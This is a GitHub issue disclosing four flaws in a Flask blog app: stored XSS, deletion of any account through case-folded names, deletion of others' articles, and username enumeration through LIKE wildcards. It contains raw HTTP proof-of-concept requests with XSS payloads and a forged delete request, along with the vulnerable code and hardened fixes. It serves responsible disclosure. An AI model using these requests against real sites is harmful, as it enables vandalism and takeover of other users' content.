security vulnerability #130

Open
coleak2021 opened this issue Feb 11, 2025 · 1 comment
@coleak2021
I found the following security risks in this framework:
1. Stored XSS
2. Arbitrary account deletion
3. Arbitrary article deletion
4. All usernames leaked

Here is the specific information:

1. Stored XSS

Post an article and put a malicious payload in postContent, postTags and postTitle respectively; all three places can trigger XSS.
POC:

POST /createpost HTTP/1.1
Host: 192.168.1.9:5000
Content-Length: 1031
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.9:5000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWcTd01yIBOhWCdwY
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.9:5000/createpost
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: darkMode=false; session=.eJyrVkouLkqLL8nPTs1TslIyTTIxNbGwNElLs0g1trQwsTBLTTE1M0mzMEhOM0iyTDIyMrU0SjFKU9JRyknMSy9NTE8F6qrKAPJLi1OL_BJzQfzElNzMPKhQUH4OQqgWAFJfIjA.Z6scEw.h6qGsG7mkcH1fyMtcx0t6aoXCdo
Connection: close

------WebKitFormBoundaryWcTd01yIBOhWCdwY
Content-Disposition: form-data; name="csrf_token"

IjViNDU0ODk0ZmY4ZTM5ODQ4NmVkNTY0ZjgwY2YwYjliMjI1OTJkMmYi.Z6scFg.geb2tHL1ckCGaEjzat8CXp0xEOU
------WebKitFormBoundaryWcTd01yIBOhWCdwY
Content-Disposition: form-data; name="postTitle"

<img src=x onerror=alert(1)>
------WebKitFormBoundaryWcTd01yIBOhWCdwY
Content-Disposition: form-data; name="postTags"

<img src=x onerror=alert(2)>
------WebKitFormBoundaryWcTd01yIBOhWCdwY
Content-Disposition: form-data; name="postBanner"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryWcTd01yIBOhWCdwY
Content-Disposition: form-data; name="postCategory"

Apps
------WebKitFormBoundaryWcTd01yIBOhWCdwY
Content-Disposition: form-data; name="postContent"

<p>&lt;img src=x onerror=alert(3)&gt;</p><div><br></div>
------WebKitFormBoundaryWcTd01yIBOhWCdwY
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryWcTd01yIBOhWCdwY--

2. Arbitrary account deletion

To delete the administrator user admin, for example, first register any account and then change its username to admiN, or directly register an account named admiN; then delete the account named admiN. At this point the admin account is maliciously deleted.
The source code that creates the vulnerability is as follows; the code deletes the account whose lowercased name corresponds to the given user name.

cursor.execute(
    """delete from users where lower(userName) = ? """,  # Delete the row from the users table where the lowercased userName column matches the lowercased given userName
    [
        (userName.lower())
    ],  # Use the lowercased version of the userName and a parameterized query to avoid SQL injection
)

3. Arbitrary article deletion

The back-end does not verify that the user sending the request is the author of the article. Click to delete one of your own articles and capture the traffic: the logic is to send a POST request to /post/{postTitle}, where postTitle is the title of any article. Changing the title in Burp to the title of someone else's article deletes that person's article.
POC:

POST /post/red-dead-redemption-2-a-masterpiece-in-the-world-of-gaming-b6f357785b37 HTTP/1.1
Host: 192.168.1.9:5000
Content-Length: 120
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.9:5000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.9:5000/post/test-e720370f494f
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: darkMode=false; session=.eJwty00OQDAQhuG7zNpCiyiHsHABmRkzJPWTaG2Iu6vE7nve5LuBw6FD3L1s0AK7mlRUKzIOUbjKTSlaos2JtDDU2LpwPI6QwYLbdOIk6XXNyWeQo8P1c5QQeV8E_d_7hNS_Cc8LYHIlYQ.Z6gzmQ.gbTc_haEntB5fahGESiX1zpXv6g
Connection: close

csrf_token=ImM4N2JmZWZmNWIxOGFhZWM1MDE0ZWY0YTIwYmJmMzFiOTI3MzhjZGQi.Z6gzuA.LI1Kf9aKj5G0A2PO2ZydGwXfoFM&postDeleteButton=

4. All usernames leaked

The source code that creates the vulnerability is as follows. The backend does not validate the input query; passing % or _ as the query returns all the full usernames.

@searchBlueprint.route("/search/<query>", methods=["GET", "POST"])
def search(query):
    # Replace the %20 and + characters in the query with spaces
    query = query.replace("%20", " ")
    queryNoWhiteSpace = query.replace("+", "")
    queryUsers = cursor.execute(
        """select * from users where userName like ? """,
        [
            ("%" + queryNoWhiteSpace + "%"),
        ],
    ).fetchall()

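The account-deletion and username-search findings above both come down to how the SQL is built. The following is an added example, not code from the reporter or from the project: it reproduces each reported query against a constructed in-memory SQLite schema (the `users`/`posts` tables and their columns are assumptions) and shows a hardened counterpart next to it, including an ownership check of the kind the article-deletion finding calls for.

```python
import sqlite3

# Constructed in-memory schema; column names are assumed to mirror the
# report (userName) and are not the project's real schema.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        create table users(userName text primary key);
        create table posts(urlID text primary key, author text);
        insert into users values ('admin'), ('admiN'), ('alice'), ('bob_1');
        insert into posts values ('red-dead-b6f3', 'alice'), ('test-e720', 'bob_1');
    """)
    return db

# As reported: lower() on both sides collapses 'admin' and 'admiN' into one match.
def delete_user_vulnerable(db, user_name):
    cur = db.execute("delete from users where lower(userName) = ?", [user_name.lower()])
    return cur.rowcount  # number of accounts removed

# Hardened: exact match on the stored name, and only the account owner may
# delete it (an admin-role check, if the app has one, would be added here).
def delete_user(db, requester, target):
    if requester != target:
        return False
    return db.execute("delete from users where userName = ?", [target]).rowcount == 1

# As reported: % and _ in the user-supplied query act as LIKE wildcards.
def search_users_vulnerable(db, query):
    pattern = "%" + query.replace("+", "") + "%"
    rows = db.execute("select userName from users where userName like ?", [pattern])
    return [r[0] for r in rows]

def escape_like(term, esc="!"):
    # Escape the LIKE metacharacters (and the escape character itself) so
    # the user's input is matched literally.
    return term.replace(esc, esc + esc).replace("%", esc + "%").replace("_", esc + "_")

# Hardened: an ESCAPE clause makes user-supplied % and _ ordinary characters.
def search_users(db, query):
    pattern = "%" + escape_like(query.replace("+", "")) + "%"
    rows = db.execute("select userName from users where userName like ? escape '!'", [pattern])
    return [r[0] for r in rows]

# Hardened post deletion: the row must belong to the requesting user, so a
# forged postTitle for someone else's article deletes nothing.
def delete_post(db, requester, url_id):
    cur = db.execute("delete from posts where urlID = ? and author = ?", [url_id, requester])
    return cur.rowcount == 1
```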

@DogukanUrker
Owner

Thank you @coleak2021 for the detailed report, I’ll fix these issues as soon as possible. Also, thanks to @brandon-t-elliott for reaching out via email and sharing feedback. I appreciate both of you for helping improve the project and have credited you accordingly.
